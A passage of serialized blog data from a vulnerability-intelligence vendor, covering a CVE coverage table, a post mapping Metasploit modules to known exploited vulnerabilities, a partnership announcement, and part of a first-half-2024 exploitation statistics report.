Bypass",[341,67619,67553],{},[341,67621,67622],{},"CVE-2023-28121",[341,67624,59510],{},[341,67626,59510],{},[341,67628,59510],{},[341,67630,59510],{},[341,67632,59510],{},[341,67634],{},[313,67636,67637,67640,67642,67645,67647,67649,67651,67653,67655],{},[341,67638,67639],{},"Anyscale Ray Job Execution (Unpatched)",[341,67641,67553],{},[341,67643,67644],{},"CVE-2023-48022",[341,67646,59510],{},[341,67648,59510],{},[341,67650,59510],{},[341,67652,59510],{},[341,67654,59510],{},[341,67656],{},[313,67658,67659,67662,67664,67667,67669,67671,67673,67675,67677],{},[341,67660,67661],{},"Delta Electronics DIAEnergie RecalculateScript Script Injection",[341,67663,67553],{},[341,67665,67666],{},"CVE-2024-4547",[341,67668,59510],{},[341,67670,59510],{},[341,67672,59510],{},[341,67674,59510],{},[341,67676,59510],{},[341,67678],{},[313,67680,67681,67684,67686,67689,67691,67693,67695,67697,67699],{},[341,67682,67683],{},"Delta Electronics DIAEnergie RecalculateHDMWYC Script Injection",[341,67685,67553],{},[341,67687,67688],{},"CVE-2024-4548",[341,67690,59510],{},[341,67692,59510],{},[341,67694,59510],{},[341,67696,59510],{},[341,67698,59510],{},[341,67700],{},[313,67702,67703,67706,67708,67711,67713,67715,67717,67719,67721],{},[341,67704,67705],{},"Fortra FileCatalyst Workflow SQL Injection",[341,67707,67553],{},[341,67709,67710],{},"CVE-2024-5276",[341,67712,59510],{},[341,67714],{},[341,67716,59510],{},[341,67718,59510],{},[341,67720,59510],{},[341,67722],{},[313,67724,67725,67728,67730,67733,67735,67737,67739,67741,67743],{},[341,67726,67727],{},"Calibre Content Server RCE",[341,67729,67553],{},[341,67731,67732],{},"CVE-2024-6782",[341,67734,59510],{},[341,67736,59510],{},[341,67738,59510],{},[341,67740,59510],{},[341,67742,59510],{},[341,67744],{},[313,67746,67747,67750,67752,67755,67757,67759,67761,67763,67765],{},[341,67748,67749],{},"Ivanti vTM Authentication 
Bypass",[341,67751,67553],{},[341,67753,67754],{},"CVE-2024-7593",[341,67756,59510],{},[341,67758,59510],{},[341,67760,59510],{},[341,67762,59510],{},[341,67764,59510],{},[341,67766,59510],{},[313,67768,67769,67772,67774,67777,67779,67781,67783,67785,67787],{},[341,67770,67771],{},"SPIP porte_plume plugin unauthenticated RCE",[341,67773,67553],{},[341,67775,67776],{},"CVE-2024-7954",[341,67778,59510],{},[341,67780,59510],{},[341,67782,59510],{},[341,67784,59510],{},[341,67786,59510],{},[341,67788],{},[313,67790,67791,67794,67796,67798,67800,67802,67804,67806,67808],{},[341,67792,67793],{},"Cisco Smart Software Manager On-Prem Password Reset",[341,67795,67553],{},[341,67797,31448],{},[341,67799,59510],{},[341,67801],{},[341,67803,59510],{},[341,67805,59510],{},[341,67807,59510],{},[341,67809],{},[313,67811,67812,67815,67817,67820,67822,67824,67826,67828,67830],{},[341,67813,67814],{},"Spring Cloud Dataflow Arbitrary File Write",[341,67816,67553],{},[341,67818,67819],{},"CVE-2024-22263",[341,67821],{},[341,67823],{},[341,67825,59510],{},[341,67827,59510],{},[341,67829,59510],{},[341,67831],{},[313,67833,67834,67837,67839,67842,67844,67846,67848,67850,67852],{},[341,67835,67836],{},"Authentication bypass allows for administrative access to upload ASP documents, leading to remote code execution.",[341,67838,67553],{},[341,67840,67841],{},"CVE-2024-26331",[341,67843,59510],{},[341,67845,59510],{},[341,67847,59510],{},[341,67849,59510],{},[341,67851,59510],{},[341,67853],{},[313,67855,67856,67859,67861,67864,67866,67868,67870,67872,67874],{},[341,67857,67858],{},"SolarWinds Web Help Desk Hard-coded Credentials",[341,67860,67553],{},[341,67862,67863],{},"CVE-2024-28987",[341,67865],{},[341,67867],{},[341,67869],{},[341,67871,59510],{},[341,67873,59510],{},[341,67875],{},[313,67877,67878,67881,67883,67886,67888,67890,67892,67894,67896],{},[341,67879,67880],{},"IPv6 Network Stack Overflow 
DoS",[341,67882,67553],{},[341,67884,67885],{},"CVE-2024-38063",[341,67887,59510],{},[341,67889],{},[341,67891,59510],{},[341,67893],{},[341,67895],{},[341,67897],{},[313,67899,67900,67903,67905,67908,67910,67912,67914,67916,67918],{},[341,67901,67902],{},"Windows Server MadLicense Unauth RCE",[341,67904,67553],{},[341,67906,67907],{},"CVE-2024-38077",[341,67909],{},[341,67911],{},[341,67913,59510],{},[341,67915,59510],{},[341,67917,59510],{},[341,67919],{},[313,67921,67922,67925,67927,67930,67932,67934,67936,67938,67940],{},[341,67923,67924],{},"Apache OFBiz improper authorization checks allow for RCE",[341,67926,67553],{},[341,67928,67929],{},"CVE-2024-38856",[341,67931,59510],{},[341,67933,59510],{},[341,67935,59510],{},[341,67937,59510],{},[341,67939,59510],{},[341,67941,59510],{},[313,67943,67944,67947,67949,67952,67954,67956,67958,67960,67962],{},[341,67945,67946],{},"Bazarr Path Traversal",[341,67948,67553],{},[341,67950,67951],{},"CVE-2024-40348",[341,67953,59510],{},[341,67955,59510],{},[341,67957,59510],{},[341,67959,59510],{},[341,67961,59510],{},[341,67963],{},[313,67965,67966,67969,67971,67974,67976,67978,67980,67982,67984],{},[341,67967,67968],{},"Fonoster VoiceServer VoiceApp Path Traversal Info Leak",[341,67970,67553],{},[341,67972,67973],{},"CVE-2024-43035",[341,67975],{},[341,67977],{},[341,67979,59510],{},[341,67981,59510],{},[341,67983,59510],{},[341,67985],{},[61,67987,59830],{"id":59829},[18,67989,65143,67990,59],{},[47,67991,20558],{"href":14297,"rel":67992},[51],[61,67994,59851],{"id":59850},[18,67996,59854,67997],{},[47,67998,59857],{"href":59857,"rel":67999},[51],{"title":219,"searchDepth":220,"depth":220,"links":68001},[68002,68003,68004],{"id":67518,"depth":220,"text":67519},{"id":59829,"depth":220,"text":59830},{"id":59850,"depth":220,"text":59851},"2024-09-04","In August 2024, we developed new Initial Access Intelligence (IAI) artifacts for 20 CVEs, covering 17 different vendors and 
products.",{},"\u002Fblog\u002Finitial-access-intelligence-august-2024",{"title":67478,"description":68006},"blog\u002Finitial-access-intelligence-august-2024",[1281],"HALcTIP3gnAMXBmvPAGxlzfwQyqa3bdOKuDOgRr0GqI",{"id":68014,"title":68015,"articles":68016,"authors":68025,"body":68027,"date":68130,"description":68131,"extension":234,"image":7,"link":7,"meta":68132,"navigation":237,"path":68134,"seo":68135,"series":7,"stem":68136,"subtype":7,"tags":68137,"__hash__":68138},"blog\u002Fblog\u002Fmetasploit-kev.md","Weaponized Vulnerabilities Deserve a Seat at The Prioritization Table",[68017,68022],{"title":68018,"source":68019,"link":68020,"date":68021},"CramHacks Chronicles #51: Weekly Cybersecurity Newsletter!","CramHacks","https:\u002F\u002Fwww.cramhacks.com\u002Fp\u002Fcramhacks-51?_bhlid=bd3a8eb9d66eba5a9e4cb752dc97a6d76db047cb&utm_campaign=cramhacks-chronicles-51-weekly-cybersecurity-newsletter&utm_medium=newsletter&utm_source=www.cramhacks.com","2024-08-28",{"title":68023,"source":61436,"link":68024,"date":68021},"Risky Biz News: Volt Typhoon returns with a new zero-day","https:\u002F\u002Fnews.risky.biz\u002Frisky-biz-news-volt-typhoon-returns-with-a-new-zero-day\u002F",[68026],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":68028,"toc":68124},[68029,68035,68038,68041,68045,68052,68056,68060,68066,68069,68073,68078,68081,68085,68091,68094,68098,68104,68107,68113,68115,68117,68119],[18,68030,68031],{},[68,68032],{":width":10862,"alt":68033,"src":68034},"Metasploit Mapped to KEV by Year","\u002Fblog\u002Fmetasploit-kev\u002Fmetasploit-kev-year.png",[18,68036,68037],{},"On the weekends, I often dive into vulnerability data, searching for new sources of known exploitation. This process frequently leads to uncovering evidence of vulnerabilities being exploited in the wild that haven't been documented before. 
As I comb through older security advisories, blogs, and forums, I often encounter familiar mentions of HD Moore and the Metasploit project.",[18,68039,68040],{},"Given this, I set out in this research to highlight the importance of prioritizing and remediating weaponized vulnerabilities by mapping Metasploit modules to Known Exploited Vulnerabilities to provide deeper insight.",[1920,68042,68044],{"id":68043},"what-is-a-weaponized-vulnerability","What is a Weaponized Vulnerability?",[18,68046,68047,68048,68051],{},"Weaponized vulnerabilities are those with explicit malicious intent, historic malware usage, prior reports of exploitation, or inclusion in point-and-click exploitation frameworks or kits. Projects facilitating point-and-click exploitation could include malicious exploit kits, such as those previously tracked by Contagio, or open source or commercial offerings like Metasploit, VulnCheck Initial Access Intelligence, CANVAS, or Core Impact. Additionally, weaponized exploits often have secondary payloads, droppers, or implants. In our ",[47,68049,57777],{"href":44893,"rel":68050},[51],"published in May, we observed that 2% of vulnerabilities from the past decade have been weaponized.",[1920,68053,68055],{"id":68054},"observations-from-mapping-known-exploitation-to-the-metasploit-project","Observations from Mapping Known Exploitation to the Metasploit Project",[61,68057,68059],{"id":68058},"a-first-look-at-metasploit-modules-mapped-to-known-exploited-vulnerabilities","A First Look at Metasploit Modules Mapped to Known Exploited Vulnerabilities",[18,68061,68062],{},[68,68063],{":width":10862,"alt":68064,"src":68065},"Metasploit Mapped to KEV","\u002Fblog\u002Fmetasploit-kev\u002Fmetasploit-kev.png",[18,68067,68068],{},"Initially, I explored existing vulnerabilities with a Metasploit module that mapped to a Known Exploited Vulnerability (KEV) in VulnCheck KEV. I also considered breaking out CISA KEV, which is included in VulnCheck KEV, for this analysis. 
The data revealed that 26% of Metasploit modules are associated with a Known Exploited Vulnerability. This percentage seemed lower than expected, prompting further investigation.",[61,68070,68072],{"id":68071},"exploring-metasploit-modules-mapped-to-known-exploited-vulnerabilities-by-year","Exploring Metasploit Modules Mapped to Known Exploited Vulnerabilities by Year",[18,68074,68075],{},[68,68076],{":width":10862,"alt":68077,"src":68034},"Metasploit KEV by Year",[18,68079,68080],{},"Next, I analyzed the Metasploit data by CVE-Year (not the CVE publish date). The results showed a high percentage of relatively newer vulnerabilities with known exploitation and much lower percentages for older vulnerabilities. From 2020 to 2024 (to date), 56% of Metasploit modules have been associated with known exploitation. Prior to 2020, this ratio drops to 19% across vulnerabilities from 1999 to 2019.\nThis trend aligns with the timing of when we began collecting evidence of known exploitation and when CISA launched the CISA KEV. It suggests that older vulnerabilities may have been exploited, but evidence is less readily available.",[61,68082,68084],{"id":68083},"metasploit-module-availability-related-to-vulncheck-kev","Metasploit Module Availability Related to VulnCheck KEV",[18,68086,68087],{},[68,68088],{":width":10862,"alt":68089,"src":68090},"Metasploit Mapped to KEV by Days","\u002Fblog\u002Fmetasploit-kev\u002Fmetasploit-kev-days.png",[18,68092,68093],{},"Another important consideration is the availability of Metasploit modules in relation to when a vulnerability was added to VulnCheck KEV. 
The data shows that 66.6% (443 out of 665) of the Metasploit modules with known exploitation evidence were available on or before the date of the indexed exploitation evidence.",[1920,68095,68097],{"id":68096},"using-known-exploitation-and-weaponization-in-an-evidence-based-approach-to-vulnerability-prioritization","Using Known Exploitation and Weaponization in an Evidence-Based Approach to Vulnerability Prioritization",[18,68099,68100],{},[68,68101],{":width":10862,"alt":68102,"src":68103},"Evidence Based Prioritization","\u002Fblog\u002Fvulnerability-prioritization\u002Fevidence-based-prioritization.png",[18,68105,68106],{},"Security practitioners have long struggled to make informed decisions due to limited exploit evidence and threat context. By giving weaponized vulnerabilities, such as those with Metasploit modules, a seat at the prioritization table alongside known exploited vulnerabilities, security practitioners can get to the vulnerabilities that are likely to be exploited faster.",[18,68108,68109,68110],{},"Learn more about how VulnCheck can help you take an evidence-based approach to vulnerability prioritization here: ",[47,68111,54458],{"href":54458,"rel":68112},[51],[61,68114,202],{"id":201},[18,68116,205],{},[18,68118,208],{},[18,68120,211,68121,217],{},[47,68122,216],{"href":214,"rel":68123},[51],{"title":219,"searchDepth":220,"depth":220,"links":68125},[68126,68127,68128,68129],{"id":68058,"depth":220,"text":68059},{"id":68071,"depth":220,"text":68072},{"id":68083,"depth":220,"text":68084},{"id":201,"depth":220,"text":202},"2024-08-27","To help security practitioners prioritize vulnerabilities using exploit evidence, we've outlined why weaponized vulnerabilities should be prioritized by mapping Metasploit modules and VulnCheck Known Exploited 
Vulnerabilities.",{"slug":68133},"metasploit-kev","\u002Fblog\u002Fmetasploit-kev",{"title":68015,"description":68131},"blog\u002Fmetasploit-kev",[1279],"AwyI8-O_F_Wkehv55Gx_zT1ms9i0IyMRymSMEvgXRsA",{"id":68140,"title":68141,"articles":7,"authors":68142,"body":68144,"date":68270,"description":68271,"extension":234,"image":7,"link":7,"meta":68272,"navigation":237,"path":68274,"seo":68275,"series":7,"stem":68276,"subtype":7,"tags":7,"__hash__":68277},"blog\u002Fblog\u002Fvulncheck-threatconnect-partnership.md","VulnCheck and ThreatConnect - Real-time Threat Visibility and the Most Comprehensive Asset Intelligence",[68143],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":68145,"toc":68268},[68146,68154,68157,68160,68163,68166,68169,68177,68182,68185,68188,68191,68199,68202,68213,68216,68221,68241],[18,68147,68148,68151],{},[295,68149,68150],{},"Speed and Accuracy:",[295,68152,68153],{},"Vulnerability Prioritization with VulnCheck and ThreatConnect to Unify Threat Defense",[18,68155,68156],{},"I’m really excited to be writing this blog to announce that VulnCheck is partnering with ThreatConnect. Why? To deliver a new level of vulnerability prioritization to joint customers with VulnCheck exploit and vulnerability data integrated into ThreatConnect’s industry-leading TI Ops Platform.",[18,68158,68159],{},"What’s cool about this partnership? At the very highest level, ThreatConnect has built its TI Ops Platform to ingest data, to correlate insights, and to use intelligence to power threat defense.",[18,68161,68162],{},"In the rapidly evolving threat landscape, vulnerability management is a daunting task. 
Every month thousands of new vulnerabilities emerge, creating a significant challenge for threat intelligence and vulnerability management analysts.",[18,68164,68165],{},"With VulnCheck’s Community Tier solutions – VulnCheck NVD++ and VulnCheck KEV - integrated for ThreatConnect customers, cyber teams have better, faster and more contextual vulnerability data to prioritize which vulnerabilities to fix first – like an early warning system for software vulnerability weaponization and exploitation.",[18,68167,68168],{},"The new integration between ThreatConnect and VulnCheck promises to address these challenges by offering a unified, intelligent approach to accelerating identification and analysis, and improving the precision of prioritizing vulnerabilities for remediation.",[18,68170,68171,68172,59],{},"If anyone wants to take a look at how this integration works, you can find VulnCheck’s solutions integrated into ThreatConnect’s TI Ops Platform, live in the ",[47,68173,68176],{"href":68174,"rel":68175},"https:\u002F\u002Fthreatconnect.com\u002Fmarketplace\u002F",[51],"ThreatConnect Marketplace",[18,68178,68179],{},[295,68180,68181],{},"The Growing Challenge of Vulnerability Management, the Importance of Prioritization, and the Role of Threat Intel",[18,68183,68184],{},"With an average of 25,000 new vulnerabilities each month, analysts must sift through vast amounts of data to identify which vulnerabilities pose the most significant threats to their organizations. It’s a time-consuming process and often leads to wasted resources, gaps between vulnerability disclosure and remediation, and analyst burnout.",[18,68186,68187],{},"Threat intelligence is essential for vulnerability management. Some vulns pose immediate threats, while others may never be exploited or weaponized. Teams and tools can only manage vulnerabilities well when they have a way to prioritize them consistently. 
Analysts need tools that help them get the necessary insights to quickly determine which vulnerabilities are the most critical to address. This is where VulnCheck enhances that capability for ThreatConnect customers.",[18,68189,68190],{},"By understanding the tactics, techniques, and procedures (TTPs) of threat actors, analysts can better assess the risk associated with specific vulnerabilities. This intelligence helps prioritize remediation efforts and allocate resources more effectively.",[18,68192,68193,68196,68198],{},[295,68194,68195],{},"Introducing a New Integration between ThreatConnect and VulnCheck",[1823,68197],{},"\nThreatConnect is a leading threat intelligence platform that offers comprehensive tools for managing and analyzing threat data. It provides a centralized hub for cybersecurity teams to collaborate, investigate threats, and automate responses.",[18,68200,68201],{},"VulnCheck offers unparalleled visibility into the vulnerability ecosystem. It provides detailed intelligence on vulnerabilities and exploits, helping organizations stay ahead of threat actors and enabling them to proactively reduce their attack surface. What is different about VulnCheck is that it draws its prioritization capability from:",[1789,68203,68204,68207,68210],{},[25,68205,68206],{},"Its ability to find evidence of exploitation in the wild – and that is what matters for actually defending any organization.",[25,68208,68209],{},"VulnCheck’s data is the single largest vulnerability and exploit dataset in the industry – over 325M records maintained on ALL CVEs. 
And from sources that no other solution can access on a global scale.",[25,68211,68212],{},"The intelligence is delivered in machine consumable format – meaning that tools can ingest the data with no human interpretation \u002F analysis so that the teams can easily work it into workflows that are already built and relied on in the enterprise.",[18,68214,68215],{},"The integration between ThreatConnect and VulnCheck combines the strengths of both platforms. VulnCheck’s vulnerability and exploit intelligence are seamlessly integrated into the ThreatConnect TI Ops Platform, providing a unified view of the threat landscape. This integration enhances the precision with which analysts can identify and prioritize critical vulnerabilities.",[18,68217,68218],{},[295,68219,68220],{},"Key Benefits of the Integration",[22,68222,68223,68229,68235],{},[25,68224,68225,68228],{},[295,68226,68227],{},"Unified Vulnerability Intelligence"," - One of the most significant benefits of the ThreatConnect and VulnCheck integration is the unified view of vulnerability intelligence. Analysts no longer need to collect and process data from disparate sources manually. Instead, they get out-of-the-box insights that streamline their workflows and improve accuracy.",[25,68230,68231,68234],{},[295,68232,68233],{},"Novel Insights and Detailed Analysis"," - The integration offers in-depth details on vulnerabilities and threat actor activities. Analysts gain novel insights into emerging threats and exploits, enabling them to make more informed decisions and prioritize remediation efforts more effectively.",[25,68236,68237,68240],{},[295,68238,68239],{},"Automated Monitoring and Early Warning Indicators"," - Automation is a game-changer in vulnerability management. The integration automates the monitoring of emerging threats and exploits, providing early warning indicators that help analysts stay ahead of potential attacks. 
This proactive approach reduces the time between vulnerability disclosure and remediation.",[18,68242,68243,68246,68248,68249,14193,68253,68258,68259,68263,68264,59],{},[295,68244,68245],{},"Learn more today!!",[1823,68247],{},"\nTo learn more about the VulnCheck integration with ThreatConnect TI Ops, please visit the ",[47,68250,68176],{"href":68251,"rel":68252},"https:\u002F\u002Fthreatconnect.com\u002Fmarketplace\u002Fvulncheck",[51],[47,68254,68257],{"href":68255,"rel":68256},"https:\u002F\u002Fthreatconnect.com\u002Frequest-a-demo\u002F",[51],"Contact ThreatConnect to speak to an expert today"," to get a personalized demo of the TI Ops Platform and to see the integration in action. To learn more about ",[47,68260,2709],{"href":68261,"rel":68262},"https:\u002F\u002Fvulncheck.com\u002F",[51]," and get a demo, ",[47,68265,68267],{"href":68266},"mailto:sales@vulncheck.com","reach out to speak with one of their vulnerability experts today",{"title":219,"searchDepth":220,"depth":220,"links":68269},[],"2024-08-06","VulnCheck is partnering with ThreatConnect to deliver a new level of vulnerability prioritization to joint customers with VulnCheck exploit and vulnerability data integrated into ThreatConnect’s industry-leading TI Ops Platform.",{"slug":68273},"vulncheck-threatconnect-partnership","\u002Fblog\u002Fvulncheck-threatconnect-partnership",{"title":68141,"description":68271},"blog\u002Fvulncheck-threatconnect-partnership","pmrfZpvIpmTgkm_swLH-uST3SAr39kKGvEgafllfLHo",{"id":68279,"title":68280,"articles":68281,"authors":68302,"body":68304,"date":68828,"description":68829,"extension":234,"image":7,"link":7,"meta":68830,"navigation":237,"path":68832,"seo":68833,"series":7,"stem":68834,"subtype":7,"tags":68835,"__hash__":68836},"blog\u002Fblog\u002Fstate-of-exploitation-1h-2024.md","State of Exploitation - A Peek into 1H-2024 Vulnerability Exploitation",[68282,68285,68289,68293,68298],{"title":68283,"source":39566,"link":68284,"date":68270},"Daily Briefing for 
08.06.24","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fdaily-briefing\u002F13\u002F149",{"title":68286,"source":61436,"link":68287,"date":68288},"Risky Biz News: Ransomware attack hits Olympic venues","https:\u002F\u002Fnews.risky.biz\u002Frisky-biz-news-ransomware-attack-hits-olympic-venues\u002F","2024-08-07",{"title":68290,"source":3508,"link":68291,"date":68292},"Resilient Cyber Newsletter #9","https:\u002F\u002Fwww.resilientcyber.io\u002Fp\u002Fresilient-cyber-newsletter-9?utm_source=substack&publication_id=1138747&post_id=147516014&utm_medium=email&utm_content=share&utm_campaign=email-share&triggerShare=true&isFreemail=true&r=3eto0v&triedRedirect=true","2024-08-13",{"title":68294,"source":68295,"link":68296,"date":68297},"[tl;dr sec] #244 - Cloud Security Slides, Threat Modeling, Security Program Templates","tl;dr sec","https:\u002F\u002Ftldrsec.com\u002Fp\u002Ftldr-sec-244","2024-08-22",{"title":68299,"source":40906,"link":68300,"date":68301},"Scary Security Stats: Roundup from 2024 Research","https:\u002F\u002Fvmblog.com\u002Farchive\u002F2024\u002F10\u002F31\u002Fscary-security-stats-roundup-from-2024-research.aspx","2024-10-31",[68303],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":68305,"toc":68808},[68306,68311,68314,68320,68324,68328,68337,68339,68343,68357,68361,68375,68379,68389,68393,68396,68400,68403,68406,68549,68552,68556,68562,68567,68570,68574,68577,68716,68720,68725,68728,68732,68735,68746,68750,68753,68757,68762,68765,68769,68771,68774,68779,68786,68788,68791,68794,68797,68799,68801,68803],[18,68307,68308],{},[68,68309],{":width":10862,"alt":58618,"src":68310},"\u002Fblog\u002Fstate-of-exploitation-1h-2024\u002Fvulncheck-kev-1h-2024.png",[18,68312,68313],{},"In this series, we explore vulnerability disclosure and exploitation, drawing insights from VulnCheck’s Exploit and Vulnerability Intelligence services. 
VulnCheck leverages automated and scalable processes to collect and analyze data from various sources, providing a comprehensive overview of the threat landscape.\nOur goal in this article is to provide valuable perspectives for the security community focused on what we can observe from trends in vulnerability disclosure, exploitation, weaponization, and exploit availability during the first half of 2024 (Jan-June).",[18,68315,68316,68317,59],{},"Previously we provided insights on the last decade of vulnerability exploitation ",[47,68318,305],{"href":44893,"rel":68319},[51],[1920,68321,68323],{"id":68322},"a-look-into-1h-2024-vulnerability-exploitation","A look into 1H-2024 Vulnerability Exploitation",[61,68325,68327],{"id":68326},"overview","Overview",[18,68329,68330,68331,68336],{},"In the first half of 2024, we observed consistent public disclosure of exploitation in the wild from product companies, security firms, researchers, government agencies, and the broader security community. These disclosures provide defenders with crucial visibility into threats to their environments, allowing for timely action. It’s common for security teams to use this knowledge for vulnerability prioritization and security product teams to use this shared knowledge to prioritize building detection capabilities among many other purposes. We strongly advocate for the public disclosure of exploitation, as it highlights real threats posed to organizations that can be addressed. 
It is clear that the exploitation of vulnerabilities remains a persistent threat to organizations, as the 2024 ",[47,68332,68335],{"href":68333,"rel":68334},"https:\u002F\u002Fwww.verizon.com\u002Fbusiness\u002Fresources\u002Freports\u002F2024-dbir-data-breach-investigations-report.pdf",[51],"Verizon DBIR"," highlighted earlier this year.",[61,68338,43093],{"id":43092},[993,68340,68342],{"id":68341},"known-exploited-vulnerability-trends","Known Exploited Vulnerability Trends",[22,68344,68345,68348,68351,68354],{},[25,68346,68347],{},"VulnCheck added 390 vulnerabilities to the VulnCheck Known Exploited Vulnerabilities (KEV) Catalog that we identified for the first time as being exploited in the wild in 2024, compared with 73 exploited vulnerabilities captured by CISA KEV.",[25,68349,68350],{},"The Known Exploited Vulnerabilities span 235 software suppliers and 310 products and services.",[25,68352,68353],{},"The top five product categories with known exploited vulnerabilities are: Network Edge Devices, Content Management Systems (CMS), Open Source Software, Server Software, and Operating Systems.",[25,68355,68356],{},"68 different sources provided the earliest reported exploitation of one or more vulnerabilities in the wild in the first half of 2024.",[993,68358,68360],{"id":68359},"zero-day-botnet-and-exploit-trends","Zero-day, Botnet and Exploit Trends",[22,68362,68363,68369,68372],{},[25,68364,68365,68366,68368],{},"In the first half of 2024, we captured evidence of 53 zero-day vulnerabilities, with exploitation evidence available at or before the public disclosure of the vulnerabilities. This represents 13.6% ",[1373,68367,353],{}," of the Known Exploited Vulnerabilities (KEVs) added to the VulnCheck KEV catalog during this period.",[25,68370,68371],{},"During the first half of 2024, we observed 92 vulnerabilities being weaponized for the first time, with 50 confirmed as exploited in the wild. 
Of these 50 vulnerabilities, 58% (29\u002F50) were weaponized before their exploitation was disclosed.",[25,68373,68374],{},"70% of vulnerabilities had one or more PoC available prior to exploitation disclosure.",[61,68376,68378],{"id":68377},"known-exploited-vulnerabilities","Known Exploited Vulnerabilities",[18,68380,68381,68382,68386,68387],{},"During 1H-2024, VulnCheck added 390 vulnerabilities to the ",[47,68383,68385],{"href":2871,"rel":68384},[51],"VulnCheck Known Exploited Vulnerabilities (KEV) Catalog"," that were identified for the first time as being exploited in the wild in 2024, compared with 73 exploited vulnerabilities captured by CISA KEV. ",[1373,68388,467],{},[18,68390,68391],{},[68,68392],{":width":10862,"alt":58618,"src":68310},[18,68394,68395],{},"The 390 KEVs added to VulnCheck KEV covered 235 software suppliers across 310 products and services. Software suppliers topping the list include Microsoft, Apple, Ivanti, Google, Oracle, D-Link, Apache, Adobe and Hiltron Systems. Products topping the list include Microsoft Windows, Apple OS\u002FIOS\u002FSafari, Netlify OpenMetadata, Citrix Netscaler, Linux Kernel, Hiltron DVR, Ivanti Connect Secure and Google Chrome.",[993,68397,68399],{"id":68398},"product-categories-for-known-exploited-vulnerabilities","Product Categories for Known Exploited Vulnerabilities",[18,68401,68402],{},"For the first time, we categorized the 1H-2024 KEVs to better understand which product categories are most impacted by known exploited vulnerabilities. This categorization helps security practitioners identify the product categories most commonly associated with new known exploitation. This information is particularly useful in thinking about how an organization might reduce its attack surface and automate vulnerability management and patch management processes across its technology stack. 
We plan to explore several of these categories further in the future.",[18,68404,68405],{},"For this report, we categorized the 1H-2024 Known Exploited Vulnerabilities into 18 product categories:",[307,68407,68408,68418],{},[310,68409,68410],{},[313,68411,68412,68415],{},[316,68413,68414],{},"Category",[316,68416,68417],{},"# of Exploited Vulnerabilities",[336,68419,68420,68428,68435,68443,68451,68458,68465,68472,68479,68486,68493,68500,68507,68514,68521,68528,68535,68542],{},[313,68421,68422,68425],{},[341,68423,68424],{},"Network Edge Device",[341,68426,68427],{},"70",[313,68429,68430,68433],{},[341,68431,68432],{},"CMS",[341,68434,68427],{},[313,68436,68437,68440],{},[341,68438,68439],{},"Open Source Software",[341,68441,68442],{},"56",[313,68444,68445,68448],{},[341,68446,68447],{},"Server Software",[341,68449,68450],{},"35",[313,68452,68453,68456],{},[341,68454,68455],{},"Operating System",[341,68457,48690],{},[313,68459,68460,68463],{},[341,68461,68462],{},"Hardware",[341,68464,37148],{},[313,68466,68467,68470],{},[341,68468,68469],{},"File Sharing",[341,68471,850],{},[313,68473,68474,68477],{},[341,68475,68476],{},"Developer Tools",[341,68478,39259],{},[313,68480,68481,68484],{},[341,68482,68483],{},"Browser",[341,68485,39254],{},[313,68487,68488,68491],{},[341,68489,68490],{},"ICS\u002FOT",[341,68492,28534],{},[313,68494,68495,68498],{},[341,68496,68497],{},"Desktop Application",[341,68499,377],{},[313,68501,68502,68505],{},[341,68503,68504],{},"Device Management",[341,68506,723],{},[313,68508,68509,68512],{},[341,68510,68511],{},"Email",[341,68513,356],{},[313,68515,68516,68519],{},[341,68517,68518],{},"Virtualization",[341,68520,380],{},[313,68522,68523,68526],{},[341,68524,68525],{},"Backup",[341,68527,380],{},[313,68529,68530,68533],{},[341,68531,68532],{},"AI",[341,68534,491],{},[313,68536,68537,68540],{},[341,68538,68539],{},"Security 
Tools",[341,68541,353],{},[313,68543,68544,68547],{},[341,68545,68546],{},"Identity",[341,68548,353],{},[18,68550,68551],{},"The main objective of categorizing these vulnerabilities is to provide greater visibility into new exploitation evidence, helping to ensure that security practitioners monitor the most at-risk product categories for new exploited vulnerabilities. Note that some products could be associated with multiple categories; however, for this visualization, we focused on using a single primary category for each product.",[993,68553,68555],{"id":68554},"first-source-to-disclose-known-exploitation","First Source to Disclose Known Exploitation",[18,68557,68558],{},[68,68559],{":width":10862,"alt":68560,"src":68561},"First Source Exploitation","\u002Fblog\u002Fstate-of-exploitation-1h-2024\u002Ffirst-source-known-exploitation.png",[18,68563,68564,68565],{},"For the 390 vulnerabilities first identified in the first half of 2024, VulnCheck collected 10,611 references of exploitation in the wild. From hundreds of reputable sources, we identified 68 different sources that were the earliest reporters of exploitation during this period. The chart above demonstrates the number of unique exploited vulnerabilities reported first by a source. ",[1373,68566,353],{},[18,68568,68569],{},"Evidence of vulnerability exploitation is broadly distributed across many sources, which is one reason we focus on automated and scalable processes at VulnCheck.\nCoordinated disclosure or copy\u002Fpaste practices often create discrepancies in who reported exploitation first. 
This is particularly true for CISA, Microsoft, Google, Google Project Zero, and Apple, who consistently disclose exploitation evidence at roughly the same time, contributing to these discrepancies. This is a good thing, as it demonstrates the proliferation of exploitation evidence.",[993,68571,68573],{"id":68572},"top-vulnerabilities-by-the-number-of-sources-reporting-known-exploitation","Top Vulnerabilities by the number of sources reporting known exploitation",[18,68575,68576],{},"The number of unique references reporting known exploitation is often a good indicator of widely exploited vulnerabilities. The top 10 vulnerabilities by the number of unique sources referencing exploitation in the first half of 2024 include:",[307,68578,68579,68592],{},[310,68580,68581],{},[313,68582,68583,68585,68587,68589],{},[316,68584,32524],{},[316,68586,3581],{},[316,68588,3584],{},[316,68590,68591],{},"# of References",[336,68593,68594,68607,68619,68632,68645,68657,68668,68680,68692,68704],{},[313,68595,68596,68599,68602,68605],{},[341,68597,68598],{},"CVE-2024-21887",[341,68600,68601],{},"Ivanti",[341,68603,68604],{},"Connect Secure and Policy Secure",[341,68606,65524],{},[313,68608,68609,68612,68614,68616],{},[341,68610,68611],{},"CVE-2023-46805",[341,68613,68601],{},[341,68615,68604],{},[341,68617,68618],{},"47",[313,68620,68621,68624,68627,68630],{},[341,68622,68623],{},"CVE-2024-1709",[341,68625,68626],{},"ConnectWise",[341,68628,68629],{},"ScreenConnect",[341,68631,48690],{},[313,68633,68634,68636,68639,68642],{},[341,68635,43392],{},[341,68637,68638],{},"Palo Alto Networks",[341,68640,68641],{},"PAN-OS",[341,68643,68644],{},"22",[313,68646,68647,68650,68652,68655],{},[341,68648,68649],{},"CVE-2024-21893",[341,68651,68601],{},[341,68653,68654],{},"Connect Secure, Policy Secure, and 
